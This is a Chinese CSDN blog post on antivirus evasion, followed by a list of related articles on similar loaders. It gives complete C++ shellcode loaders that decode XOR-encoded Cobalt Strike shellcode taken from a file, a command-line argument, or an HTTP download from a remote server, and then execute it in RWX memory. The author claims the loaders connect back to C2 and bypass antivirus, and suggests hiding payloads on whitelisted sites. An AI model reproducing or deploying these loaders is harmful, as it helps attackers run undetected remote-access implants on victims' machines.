免杀-Shellcode分离隐藏&C++

于 2024-02-27 13:35:54 发布
阅读量1.1k 收藏 25
点赞数 30
文章标签: c++ 算法 开发语言 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45087791/article/details/136248400
版权

Shellcode分离隐藏-让杀毒找不到

内存免杀

内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的ShellCode通过分块传输的方法上传然后再拼接,这些体现了基本的"分离"思想。

➢C2远控-ShellCode分离-C/C++从文本中提取

加载器直接加载代码中的shellcode进行上线
加载器加载本地文件(图片、文本)读取数据=shellcode进行上线

目录2个文件:xxxx.exe xxx.bin
可升级:混淆加密xxx.bin,读取后进行解密执行

1、运行如下代码生成exe

#include<Windows.h>
#include <stdio.h>
#include <fstream>
#include<iostream>
using namespace std;

void load(char* buf, int shellcode_size)
{
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄

    char* shellcode = (char*)VirtualAlloc(
        NULL,
        shellcode_size,
        MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    CopyMemory(shellcode, buf, shellcode_size);
    //CreateThread函数,创建线程
    hThread = CreateThread(
        NULL, // 安全描述符
        NULL, // 栈的大小
        (LPTHREAD_START_ROUTINE)shellcode, // 函数
        NULL, // 参数
        NULL, // 线程标志
        &dwThreadId // 若成功,接收新创建的线程的线程ID DWORD变量的地址。
    );
    //通过调用 WaitForSingleObject 函数来监视事件状态,当事件设置为终止状态(WaitForSingleObject 返回 WAIT_OBJECT_0)时,每个线程都将自行终止执行。
    WaitForSingleObject(hThread, INFINITE); // 一直等待线程执行结束
}
int wmain(int argc, char* argv[])
{
    char filename[] = "p64.bin";
    // 以读模式打开文件
    ifstream infile;
    //以二进制方式打开
    infile.open(filename, ios::out | ios::binary);
    infile.seekg(0, infile.end); //追溯到流的尾部
    int length = infile.tellg(); //获取流的长度
    infile.seekg(0, infile.beg);//回溯到流头部

    char* data = new char[length]; //存取文件内容
    if (infile.is_open()) {
        cout << "reading from the file" << endl;
        infile.read(data, length);
    }
    cout << "size of data =" << sizeof(data) << endl;
    cout << "size of file =" << length << endl;
    for (int i = 0; i < length; i++)
    {
        printf("\\%x ", data[i]);
    }

    for (int i = 0; i < length; i++)
    {
        data[i] ^= 0x39;
    }

    int shellcode_size = length;
    load(data, shellcode_size);
    //加载成功并不会输出,推测load函数新创建的线程执行结束后,主进程也终止了。
    cout << "加载成功";
    return 0;
}

2、cs生成p64.bin shellcode文件 把两个文件放在同一个目录运行,shellocode进行0x39异或加密

➢C2远控-ShellCode分离-C/C++从参数中提取

加载器直接加载代码中的shellcode进行上线
接受执行文件后续的参数作文shellcode

#include<Windows.h>
#include <stdio.h>
#include <fstream>
#include<iostream>
using namespace std;

void load(char* buf, int shellcode_size)
{
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄

    char* shellcode = (char*)VirtualAlloc(
        NULL,
        shellcode_size,
        MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    CopyMemory(shellcode, buf, shellcode_size);
    //CreateThread函数,创建线程
    hThread = CreateThread(
        NULL, // 安全描述符
        NULL, // 栈的大小
        (LPTHREAD_START_ROUTINE)shellcode, // 函数
        NULL, // 参数
        NULL, // 线程标志
        &dwThreadId // 若成功,接收新创建的线程的线程ID DWORD变量的地址。
    );
    //通过调用 WaitForSingleObject 函数来监视事件状态,当事件设置为终止状态(WaitForSingleObject 返回 WAIT_OBJECT_0)时,每个线程都将自行终止执行。
    WaitForSingleObject(hThread, INFINITE); // 一直等待线程执行结束
}
int wmain(int argc, char* argv[])
{
    int len = strlen(argv[1]);
    char* filename = new char[len + 1];
    strcpy(filename, argv[1]);

    //参数发送的文件名读取 发送的数据流

    // 以读模式打开文件
    ifstream infile;
    //以二进制方式打开
    infile.open(filename, ios::out | ios::binary);
    infile.seekg(0, infile.end); //追溯到流的尾部
    int length = infile.tellg(); //获取流的长度
    infile.seekg(0, infile.beg);//回溯到流头部

    char* data = new char[length]; //存取文件内容
    if (infile.is_open()) {
        cout << "reading from the file" << endl;
        infile.read(data, length);
    }
    cout << "size of data =" << sizeof(data) << endl;
    cout << "size of file =" << length << endl;
    for (int i = 0; i < length; i++)
    {
        printf("\\%x ", data[i]);
    } 

    for (int i = 0; i < length; i++)
    {
        data[i] ^= 0x39;
    }

    int shellcode_size = length;
    load(data, shellcode_size);
    //加载成功并不会输出,推测load函数新创建的线程执行结束后,主进程也终止了。
    cout << "加载成功";
    return 0;
}

shellcode文件进行0x39异或加密
在这里插入图片描述

在cmd执行命令:xxxx.exe shellcode 文件发现可以上线,可以绕过火绒

可升级:xxxx.exe shellcode password

➢C2远控-ShellCode分离-C/C++从网站中提取

加载器直接加载代码中的shellcode进行上线
加载器加载访问网站(web http协议)获取数据=shellcode进行上线
1、请求获取到数据(shellcode)

2、shellcode进行调用执行

1、首先用cs生成c的shellcode文件, 将shellcode转换成十进制,代码如下

#include<Windows.h>
#include <stdio.h>




//将shellcode转换成10机制
unsigned char buf[] = "这里放shellcode";



int main()
{
	int shellcode_size = sizeof(buf);
	printf("shellcodesize=%d \n", shellcode_size);
	for (int i = 0; i < shellcode_size; i++) {
	
		printf("%d,", buf[i]);
	
	}

}

2、再kali中启动服务端,将生成的10进制文件放在aaaaa.txt文件中
在这里插入图片描述

3、生成文件,并运行发现可以上线

#include <string>
#include <windows.h>
#include <winhttp.h>
#include<iostream>
#include "file.cpp"
#pragma comment(lib, "winhttp.lib")

using namespace std;

char* WinGet(char* ip, int port, char* url)
{

	HINTERNET hSession = NULL;
	HINTERNET hConnect = NULL;
	HINTERNET hRequest = NULL;

	//************ 将char转换为wchar_t *****************/
	int ipSize;
	wchar_t* ip_wchar;
	//返回接受字符串所需缓冲区的大小,已经包含字符结尾符'\0'
	ipSize = MultiByteToWideChar(CP_ACP, 0, ip, -1, NULL, 0); //iSize =wcslen(pwsUnicode)+1=6
	ip_wchar = (wchar_t*)malloc(ipSize * sizeof(wchar_t)); //不需要 pwszUnicode = (wchar_t *)malloc((iSize+1)*sizeof(wchar_t))
	MultiByteToWideChar(CP_ACP, 0, ip, -1, ip_wchar, ipSize);

	int urlSize;
	wchar_t* url_wchar;
	//返回接受字符串所需缓冲区的大小,已经包含字符结尾符'\0'
	urlSize = MultiByteToWideChar(CP_ACP, 0, url, -1, NULL, 0); //iSize =wcslen(pwsUnicode)+1=6
	url_wchar = (wchar_t*)malloc(urlSize * sizeof(wchar_t)); //不需要 pwszUnicode = (wchar_t *)malloc((iSize+1)*sizeof(wchar_t))
	MultiByteToWideChar(CP_ACP, 0, url, -1, url_wchar, urlSize);
	//************ ********************************* *****************/


	//port = 80; //默认端口

	//1. 初始化一个WinHTTP-session句柄,参数1为此句柄的名称
	hSession = WinHttpOpen(L"WinHTTP Example/1.0",
		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
		WINHTTP_NO_PROXY_NAME,
		WINHTTP_NO_PROXY_BYPASS, 0);

	if (hSession == NULL) {
		cout << "Error:Open session failed: " << GetLastError() << endl;
		exit(0);
	}

	//2. 通过上述句柄连接到服务器,需要指定服务器IP和端口号 INTERNET_DEFAULT_HTTP_PORT:80。若连接成功,返回的hConnect句柄不为NULL
	hConnect = WinHttpConnect(hSession, ip_wchar, port, 0);
	if (hConnect == NULL) {
		cout << "Error:Connect failed: " << GetLastError() << endl;
		exit(0);
	}

	//3. 通过hConnect句柄创建一个hRequest句柄,用于发送数据与读取从服务器返回的数据。
	hRequest = WinHttpOpenRequest(hConnect, L"GET", url_wchar, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
	//其中参数2表示请求方式,此处为Get;参数3:给定Get的具体地址,如这里的具体地址为https://www.citext.cn/GetTime.php
	if (hRequest == NULL) {
		cout << "Error:OpenRequest failed: " << GetLastError() << endl;
		exit(0);
	}

	BOOL bResults;
	//发送请求
	bResults = WinHttpSendRequest(hRequest,
		WINHTTP_NO_ADDITIONAL_HEADERS,
		0, WINHTTP_NO_REQUEST_DATA, 0,
		0, 0);

	if (!bResults) {
		cout << "Error:SendRequest failed: " << GetLastError() << endl;
		exit(0);
	}
	else {
		//(3) 发送请求成功则准备接受服务器的response。注意:在使用 WinHttpQueryDataAvailable和WinHttpReadData前必须使用WinHttpReceiveResponse才能access服务器返回的数据
		bResults = WinHttpReceiveResponse(hRequest, NULL);
	}


	LPVOID lpHeaderBuffer = NULL;
	DWORD dwSize = 0;
	//4-3. 获取服务器返回数据
	LPSTR pszOutBuffer = NULL;
	DWORD dwDownloaded = 0;         //实际收取的字符数
	wchar_t* pwText = NULL;
	if (bResults)
	{
		do
		{
			//(1) 获取返回数据的大小(以字节为单位)
			dwSize = 0;
			if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) {
				cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
				break;
			}
			if (!dwSize)    break;  //数据大小为0                

			//(2) 根据返回数据的长度为buffer申请内存空间
			pszOutBuffer = new char[dwSize + 1];
			if (!pszOutBuffer) {
				cout << "Out of memory." << endl;
				break;
			}
			ZeroMemory(pszOutBuffer, dwSize + 1);       //将buffer置0

			//(3) 通过WinHttpReadData读取服务器的返回数据
			if (!WinHttpReadData(hRequest, pszOutBuffer, dwSize, &dwDownloaded)) {
				cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
			}
			if (!dwDownloaded)
				break;


		} while (dwSize > 0);
		//4-4. 将返回数据转换成UTF8
		DWORD dwNum = MultiByteToWideChar(CP_ACP, 0, pszOutBuffer, -1, NULL, 0);    //返回原始ASCII码的字符数目       
		pwText = new wchar_t[dwNum];                                                //根据ASCII码的字符数分配UTF8的空间
		MultiByteToWideChar(CP_UTF8, 0, pszOutBuffer, -1, pwText, dwNum);           //将ASCII码转换成UTF8
		//printf("\n返回数据为:\n%S\n\n", pwText);


	}

	//5. 依次关闭request,connect,session句柄
	if (hRequest) WinHttpCloseHandle(hRequest);
	if (hConnect) WinHttpCloseHandle(hConnect);
	if (hSession) WinHttpCloseHandle(hSession);

	/******************   将wchar转换为char  *******************/
	int iSize;
	char* data;

	//返回接受字符串所需缓冲区的大小,已经包含字符结尾符'\0'
	iSize = WideCharToMultiByte(CP_ACP, 0, pwText, -1, NULL, 0, NULL, NULL); //iSize =wcslen(pwsUnicode)+1=6
	data = (char*)malloc(iSize * sizeof(char)); //不需要 pszMultiByte = (char*)malloc(iSize*sizeof(char)+1);
	WideCharToMultiByte(CP_ACP, 0, pwText, -1, data, iSize, NULL, NULL);
	return data;
}




char* StrToShellcode(char str[])
{
	char buf[2048];
	const char s[2] = ",";
	char* token;
	int i = 0;
	/* 获取第一个子字符串 */
	token = strtok(str, s);
	//buf[i] = char(stoi(token)); 
	/* 继续获取其他的子字符串 */
	while (token != NULL) {

		buf[i] = char(stoi(token)); //stoi函数将字符串转换整数
		printf("%s  %d\n", token, i);
		printf("%x\n", stoi(token));
		token = strtok(NULL, s);
		i++;
	}
	load(buf, 2048);  //晕了,指针传参回主函数不会了,先在这加载了
	return buf;
}
int main(int argc, char* argv[])
{
	char* data;

	const char ip[16] = "www.aliyun.com";
	char* ips = const_cast<char*>(ip);

	const char url[11] = "aaaaa.txt";
	char* urls = const_cast<char*>(url);

	data = WinGet(ips, 8888, urls);
	cout << "返回的数据为: " << data << endl;

	//执行shellcode
	char* buf = StrToShellcode(data);

	cout << argc;
	if (argc > 2) {  //命令行参数大于两个时才加载
		char* buf = StrToShellcode(data);
	}
}

url:http://xx.xx.xx.xx/sc.txt
可升级:
1、可以在绿标白名单的网站上找一个存储路径充当
2、将shellcode的十进制代码进行混淆

➢C2远控-ShellCode分离-C/C++从管道中提取

(查杀特征大,不建议使用)
1、client客户端去发送shellcode给server服务端
2、server服务端去接受到shellcode进行加载上线

*socket,pipe等技术 *
利用建立网络通讯管道,在发送ShellCode接受执行
可升级:可以在发送过程中进行混淆加密,接受后进行解密执行

补充:

编辑器设置 VS绕过360QVM,VT全绿
https://mp.weixin.qq.com/s/UJlVvagNjmy9E-B-XjBHyw
编译器差异 G++ GCC
https://blog.csdn.net/weixin_41012767/article/details/129365597

nihao6666hhhhh
关注
  • 30
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队系列-shellcode AV bypass Evasion合集
aming小老弟
11-13 871
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
shellcode加载器
10-02
22年9月最新,采用shellcode加密分离加载,支持msf和cs
第115天:对抗-特征码定位&添加花指令&加冷门壳&加反VT保护&资源修改
qq_46081990的博客
07-22 535
之前针对的是没有打包成exe的代码做文章,现在是对打包好了的exe做文章今天针对打包好的exe,介绍了以下几种技术: 1 、通用跳转法:主要思想:通过跳转至其他代码区域执行代码,而不是按照原始代码的顺序线性执行,难以被静态查。利用工具(VirTest)检测特征码的位置,然后将特征码区域汇编移动到全0区域(即空白区),先jmp到移动后的区域,然后再jmp回来继续执行。2 、花指令改入口:花指令就是一些垃圾汇编指令(无实际操作的指令),可以使结构更加混乱,增加查难度,但单纯的花指令效果一般。
[HACK学习呀] - 2020-02-08 干货 - Shellcode总结<一>1
08-03
[HACK学习呀] - 2020-02-08 干货 - Shellcode总结<一>1
107-对抗-C&C++&溯源ShellCode上线&混淆变异算法&回调编译执行
qq_46081990的博客
07-13 1271
今天主要讲的是shellcode混淆: 1 、首先明确为什么不对exe类型做手脚,而是对shellcode做手脚?因为对exe类型做手脚(如加壳)可以,但是可能导致出错,无法上线。而对shellcode进行操作,再编译打包成exe,一般不会有这种问题。2 、软如何检测到病毒的?一般是通过逆向分析后门文件,匹配病毒特征检测到的。3 、如何用shellcode实现?今天讲的是使用加密算法(如XOR、AES、Hex、RC4)对shellcode进行加密混淆,实现
C/C++ 实现ShellCode编写与提取
CSDN
07-16 9681
简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。使用 Release 模式写代码,这是因为 Debug 模式下的代码在转换成汇编后首先都是一个 jmp,然后再跳到我们的功能代码处,但 jmp 指令是 “地址相关” 的 ,所以在转换成 shellcode 时就会出错!简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。这就是我们需要的 ShellCode 了 (o゚v゚)ノ。
Shellcode分离加载实现的两种方式(VT率:1/68)
xf555er的博客
05-24 2612
本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其次,文章讨论了如何通过远程URL加载shellcode,也提供了相应的实现代码。
Shellcode对抗(C/C++)
最新发布
qq_74806534的博客
02-17 2万+
这里便是毒软件毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
分离(python)
zhangshuaiijie的博客
06-28 635
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode。
CobaltStrike木马代码篇之python反序列化分离(一)
xf555er的博客
11-21 1707
本篇文章主要用到python来对CobaltStrike生成的Shellcode进行分离处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列化所需用到的相关函数和库
绕过AV:shellcode加载器
03-04
旁路AV 条件触发式远控VT 6/70国内软及后卫,卡巴斯基等主流软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
通过Python实现Payload分离过程详解
09-16
主要介绍了通过Python实现Payload分离过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
[HACK学习呀] - 2020-02-08 干货 - Shellcode总结<二>1
08-03
原创卿 HACK学习呀2020-02-08原文Shellcode总结-第二篇0x02 那些shellcode"混淆"shellcode是否可以像php一
30.远控专题(30)-Python加载shellcode-8种方式(VT率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
65.远控专题(65)-shellcode实践1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
rust-windows-shellcode:Rust中的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法...
关于凯撒密码加密特征值,base64加密shellcode并分离绕过
weixin_46661122的博客
07-05 1347
什么是shellcode? 在黑客攻击中,shellcode是一小段代码,用于利用软件漏洞作为有效载荷。它之所以被称为“shellcode”,是因为它通常启动一个命令shell,攻击者可以从这个命令shell控制受损的计算机,但是执行类似任务的任何代码都可以被称为shellcode。因为有效载荷(payload)的功能不仅限于生成shell,所以有些人认为shellcode的名称是不够严谨的。然而,试图取代这一术语的努力并没有得到广泛的接受。shellcode通常是用机器码编写的。 C/C++加载方式 #i
c++之shellcode加载器
qq_44657899的博客
05-26 3315
文章目录VirtualAlloc申请内存堆 VirtualAlloc申请内存 #include <windows.h> #include <iostream> #include <time.h> #pragma comment (lib, "winmm.lib") #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") void startShellCode() { unsi
shellcode
05-29
Shellcode 技术是指通过对 Shellcode 代码进行加密、混淆、变形等手段,使其在被毒软件或安全设备检测时无法被识别,从而达到的目的。 以下是一些常见的 Shellcode 技术: 1. 加密:将 Shellcode 代码进行加密,使其在内存中存储时无法被检测到。 2. 随机变形:通过修改 Shellcode 代码中的一些关键字、函数名等来使其难以被检测到。 3. 延时加载:将 Shellcode 代码分为多个部分,只有在特定条件下才会加载,从而避毒软件或安全设备检测到。 4. 模块化:将 Shellcode 代码拆分为多个模块,每个模块都可以独立执行,从而难以被检测到。 5. 零宽度字符:利用 Unicode 中的零宽度字符来隐藏 Shellcode 代码,使其在被毒软件或安全设备检测时无法被识别。 需要注意的是,Shellcode 技术只是提高了 Shellcode 的能力,但并不能完全避被检测到。因此,在实际应用中,还需要结合其他防御措施来确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值